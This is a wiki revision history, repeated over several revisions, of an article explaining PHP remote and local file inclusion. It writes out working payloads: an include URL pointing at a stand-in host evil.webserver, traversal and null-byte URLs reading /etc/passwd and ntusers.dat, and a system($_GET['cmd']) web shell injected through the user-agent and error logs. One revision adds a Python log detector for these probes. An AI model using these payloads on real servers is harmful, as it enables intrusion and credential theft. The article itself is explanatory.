[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7658File Inclusion2012-06-28T20:40:04Z<p>DPYJulietowbaijc: /* Remote File Inclusion */</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
Remote file inclusion refers to including a file that resides outside of the target site. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
If include.txt contains PHP code written by the attacker, that code will be executed on the server side, giving the attacker arbitrary code execution.<br />
<br />
{{notice|This is known as Remote File Inclusion or RFI.}}<br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous, if not more so. It occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, but '''allow_url_fopen''' and '''allow_url_include''' have been disabled in the [[PHP]] configuration, so the attacker can only reach local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]]; reviewing the code, however, shows that [[PHP|PHP]] now reads a file from the local machine and displays it on the web page. The problem with this code is that, although the [[programmer]] no longer hands an attacker execute, write and read permissions, read permission has still been relinquished: the attacker can name any file on the target host that the [[PHP|PHP]] server has permission to read, and that file will be displayed in the web page. For example, the file that contains the registry on Windows is ntusers.dat in the Windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is included rather than merely read, the attacker can view it if it is a text file, or execute any [[PHP|php]] it contains.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (the output of the whoami command) in the returned [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
GET <?php system($_GET['cmd']) ?><br />
</source><br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7657File Inclusion2012-06-28T20:32:23Z<p>DPYJulietowbaijc: /* Introduction */</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
and then gain access to every single username and [[password]] (or [[password]] hash) that is stored in the [[database]]. This can also allow for remote code execution as well as the spawning of a remote shell.<br />
<br />
{{notice|This is known as Remote File Inclusion or RFI.}}<br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous, if not more so. It occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, but '''allow_url_fopen''' and '''allow_url_include''' have been disabled in the [[PHP]] configuration, so the attacker can only reach local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]]; reviewing the code, however, shows that [[PHP|PHP]] now reads a file from the local machine and displays it on the web page. The problem with this code is that, although the [[programmer]] no longer hands an attacker execute, write and read permissions, read permission has still been relinquished: the attacker can name any file on the target host that the [[PHP|PHP]] server has permission to read, and that file will be displayed in the web page. For example, the file that contains the registry on Windows is ntusers.dat in the Windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is included rather than merely read, the attacker can view it if it is a text file, or execute any [[PHP|php]] it contains.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (the output of the whoami command) in the returned [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
GET <?php system($_GET['cmd']) ?><br />
</source><br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7656File Inclusion2012-06-28T20:15:47Z<p>DPYJulietowbaijc: </p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
This function does not merely include a library as similar functions do in [[C]]; it executes the included code as well. <br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]].<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
and then gain access to every single username and [[password]] (or [[password]] hash) that is stored in the [[database]]. This can also allow for remote code execution as well as the spawning of a remote shell.<br />
<br />
{{notice|This is known as Remote File Inclusion or RFI.}}<br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous, if not more so. It occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, but '''allow_url_fopen''' and '''allow_url_include''' have been disabled in the [[PHP]] configuration, so the attacker can only reach local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]]; reviewing the code, however, shows that [[PHP|PHP]] now reads a file from the local machine and displays it on the web page. The problem with this code is that, although the [[programmer]] no longer hands an attacker execute, write and read permissions, read permission has still been relinquished: the attacker can name any file on the target host that the [[PHP|PHP]] server has permission to read, and that file will be displayed in the web page. For example, the file that contains the registry on Windows is ntusers.dat in the Windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is included rather than merely read, the attacker can view it if it is a text file, or execute any [[PHP|php]] it contains.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (the output of the whoami command) in the returned [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
GET <?php system($_GET['cmd']) ?><br />
</source><br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7655File Inclusion2012-06-28T20:14:24Z<p>DPYJulietowbaijc: </p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. File inclusion refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
This function does not merely include a library as similar functions do in [[C]]; it executes the included code as well. <br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]].<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
and then gain access to every single username and [[password]] (or [[password]] hash) that is stored in the [[database]]. This can also allow for remote code execution as well as the spawning of a remote shell.<br />
<br />
{{notice|This is known as Remote File Inclusion or RFI.}}<br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous, if not more so. It occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, but '''allow_url_fopen''' and '''allow_url_include''' have been disabled in the [[PHP]] configuration, so the attacker can only reach local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]]; reviewing the code, however, shows that [[PHP|PHP]] now reads a file from the local machine and displays it on the web page. The problem with this code is that, although the [[programmer]] no longer hands an attacker execute, write and read permissions, read permission has still been relinquished: the attacker can name any file on the target host that the [[PHP|PHP]] server has permission to read, and that file will be displayed in the web page. For example, the file that contains the registry on Windows is ntusers.dat in the Windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is included rather than merely read, the attacker can view it if it is a text file, or execute any [[PHP|php]] it contains.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (the output of the whoami command) in the returned [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<source lang="php"><br />
GET <?php system($_GET['cmd']) ?><br />
</source><br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
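The traversal, null-byte, /proc/self/environ and log-file URLs walked through in the Local File Inclusion section above (and in the identical section of each earlier revision on this page) are also what a defender looks for in the web server's access log. The detector below is an added example, not part of the original article; it assumes Apache "combined" log lines, a constructed sample log, and that the parameters named in INCLUDE_PARAMS are the ones that select an include target (the article only uses '''file''').<br />

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Signatures for the inclusion probes the article walks through: directory
# traversal, the %00 truncation trick, /proc/self/environ, a web-server log
# file, and a remote URL handed to include().  List order fixes hit order.
SIGNATURES = [
    ("traversal", re.compile(r"(\.\./|\.\.\\){2,}")),
    ("null_byte", re.compile(r"\x00")),
    ("proc_environ", re.compile(r"/proc/self/environ")),
    ("log_poisoning", re.compile(r"/(error|access)_?log\b")),
    ("remote_include", re.compile(r"^(https?|ftp)://", re.IGNORECASE)),
]

# Query parameters treated as naming an include target.  The article's
# examples all use "file"; the other names are an assumption of this example.
INCLUDE_PARAMS = {"file", "page", "include", "template", "path"}

# Apache/nginx "combined" access-log line (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def classify_target(target):
    """Return the signature names matched by include-style parameters of a request target."""
    query = urlsplit(target).query
    hits = []
    # parse_qs already percent-decodes once; the extra unquote() catches
    # double-encoded payloads such as %252e%252e%252f.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.lower() not in INCLUDE_PARAMS:
            continue
        for raw in values:
            value = unquote(raw)
            for label, pattern in SIGNATURES:
                if pattern.search(value) and label not in hits:
                    hits.append(label)
    return hits


def scan_access_log(lines):
    """Return one finding per request whose include parameter carries a known probe."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        hits = classify_target(match.group("target"))
        if hits:
            findings.append({
                "ip": match.group("ip"),
                "target": match.group("target"),
                # A 200 on a probe means the include path was not rejected;
                # the response body should be reviewed for leaked content.
                "status": int(match.group("status")),
                "hits": hits,
            })
    return findings


# Constructed sample log, not real traffic: a benign request, then the
# article's RFI, traversal+%00, /proc/self/environ and error_log probes.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Jun/2012:20:40:04 +0000] "GET /include.php?file=howto.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [28/Jun/2012:20:40:09 +0000] "GET /include.php?file=http://evil.webserver/include.txt HTTP/1.1" 200 1024',
    '203.0.113.7 - - [28/Jun/2012:20:40:15 +0000] "GET /local.php?file=../../../../../../etc/passwd%00 HTTP/1.1" 200 2048',
    '203.0.113.7 - - [28/Jun/2012:20:40:21 +0000] "GET /local.php?file=../../../../../../proc/self/environ?cmd=whoami HTTP/1.1" 200 4096',
    '203.0.113.7 - - [28/Jun/2012:20:40:30 +0000] "GET /local.php?file=../../../../../../usr/local/apache/log/error_log?cmd=whoami HTTP/1.1" 200 8192',
    '198.51.100.2 - - [28/Jun/2012:20:41:00 +0000] "GET /local.php?file=welcome HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['status']} {', '.join(f['hits'])}  {f['target']}")
```

Only the four probe lines produce findings; the two ordinary requests for howto.php and welcome are left alone.<br />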
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7654File Inclusion2012-06-28T20:13:00Z<p>DPYJulietowbaijc: </p>
<hr />
<div>File inclusion refers to the process of manipulating the include() function into including files that were not intended to be included, whether this is for the disclosure of privileged information (such as disclosing contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. File inclusion refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
This function does not merely include a library as similar functions do in [[C]]; it executes the included code as well. <br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]].<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
and then gain access to every single username and [[password]] (or [[password]] hash) that is stored in the [[database]]. This can also allow for remote code execution as well as the spawning of a remote shell.<br />
<br />
{{notice|This is known as Remote File Inclusion or RFI.}}<br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous, if not more so. It occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, but '''allow_url_fopen''' and '''allow_url_include''' have been disabled in the [[PHP]] configuration, so the attacker can only include files on the local machine:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], but reviewing the code shows that [[PHP|PHP]] now reads a file on the local machine and displays it in the web page. The problem with this code is that, while the [[programmer]] is no longer handing execute, write and read permissions to an attacker, read permission has still been relinquished: the attacker can specify any file on the remote host that the [[PHP|PHP]] server has permission to read, and that file will be displayed in the web page. For example, the file that contains the registry on Windows is ntusers.dat in the Windows directory. The attacker may request the URL:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
